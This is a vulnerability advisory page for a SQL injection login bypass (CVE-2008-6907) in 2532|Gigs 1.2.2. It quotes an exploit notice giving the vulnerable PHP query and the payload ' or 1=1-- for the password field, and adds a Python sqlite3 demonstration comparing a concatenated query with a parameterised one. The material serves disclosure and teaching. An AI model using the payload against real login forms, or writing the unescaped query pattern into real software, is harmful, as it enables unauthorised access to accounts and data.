2532|Gigs 'index.php' Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1117085    Vulnerability type: SQL injection
Published: 2008-12-18    Updated: 2009-08-06
CVE ID: CVE-2008-6907    CNNVD ID: CNNVD-200908-002
Platform: PHP    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/7511
https://cxsecurity.com/issue/WLB-2009080083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-002
|Details
When magic_quotes_gpc is disabled, multiple SQL injection vulnerabilities in checkuser.php in 2532designs 2532|Gigs 1.2.2 Stable allow remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters. Both parameters are submitted through the login form generated by index.php and are interpolated unescaped into the authentication query.
|Exploit
/* ------------------------------------------------------------------------------------------------
 * 2532|Gigs 1.2.2 Stable Remote Login Bypass Vulnerability
 * ------------------------------------------------------------------------------------------------
 * by athos - staker[at]hotmail[dot]it
 * http://www.hotscripts.com/jump.php?listing_id=65863&jump_type=1
 * ------------------------------------------------------------------------------------------------
 * File Vuln checkuser.php
 *
 * 16. $username = $_POST['username'];
 * 17. $password = $_POST['password'];
 * ... 
 * 41. $query = "SELECT * FROM $dbt_users WHERE username = '$username' AND password = '$password'" ;
 * 42. $result = mysql_query($query) or die ( "Error in query: $query. " . mysql_error() );
 * ------------------------------------------------------------------------------------------------
 * Exploit
 *
 * http://[host]/[path]/index.php?id=login
 * 
 * Username: [username]
 * Password: [' or 1=1--]
 * ------------------------------------------------------------------------------------------------
 * Fix (Examples)
 *  
 * $username = mysql_real_escape_string($_POST['username']); 
 * $password = mysql_real_escape_string($_POST['password']);
 * 
 * ------------------------------------------------------------------------------------------------
 */

# milw0rm.com [2008-12-18]
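The following is an added example, not code from the page or from 2532|Gigs, that models the checkuser.php query in Python with sqlite3 so the bypass can be run offline. Assumptions: the table is named `users` (the real table name comes from `$dbt_users`), passwords are stored in plaintext as the page's line 41 implies, and SQLite stands in for MySQL. The payload is written as `' OR 1=1 -- ` with a trailing space because MySQL only treats `--` as a comment when whitespace follows it; SQLite accepts it either way. With magic_quotes_gpc enabled, PHP would backslash-escape the quote in `$_POST['password']` before it reached the query, which is why the advisory conditions on that setting being off.

```python
"""Added model of the 2532|Gigs checkuser.php login query (not project code).

Constructed assumptions: the users table is named `users`, passwords are
plaintext, and SQLite stands in for MySQL. The comment marker is written as
"-- " (trailing space) so the payload is valid for both engines.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the $dbt_users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("bob", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Mirrors line 41 of checkuser.php: raw form values pasted into the SQL text."""
    query = (
        f"SELECT * FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchall()


def safe_login(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Hardened form: bound parameters keep attacker data out of the SQL grammar."""
    return conn.execute(
        "SELECT * FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()


def bypasses_auth(login, conn: sqlite3.Connection) -> bool:
    """True if a bogus username plus the injection payload still returns rows.

    Against the vulnerable query the WHERE clause becomes
    (username = 'nobody' AND password = '') OR 1=1 -- '
    which matches every user; the trailing quote is swallowed by the comment.
    """
    payload = "' OR 1=1 -- "
    return len(login(conn, "nobody", payload)) > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable query bypassed:", bypasses_auth(vulnerable_login, db))  # True
    print("parameterised query bypassed:", bypasses_auth(safe_login, db))     # False
```

Running the module shows the concatenated query returning every row for a non-existent username, while the parameterised version returns nothing for the same input and still authenticates a correct username/password pair. Prepared statements are the fix to prefer over the escaping shown in the exploit's "Fix (Examples)" section, since escaping only helps when every interpolation site is covered and the column is quoted.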
|References

Source: XF
Name: 2532gigs-checkuser-sql-injection(47491)
Link: http://xforce.iss.net/xforce/xfdb/47491
Source: BID
Name: 32913
Link: http://www.securityfocus.com/bid/32913
Source: MILW0RM
Name: 7511
Link: http://www.milw0rm.com/exploits/7511
Source: SECUNIA
Name: 26585
Link: http://secunia.com/advisories/26585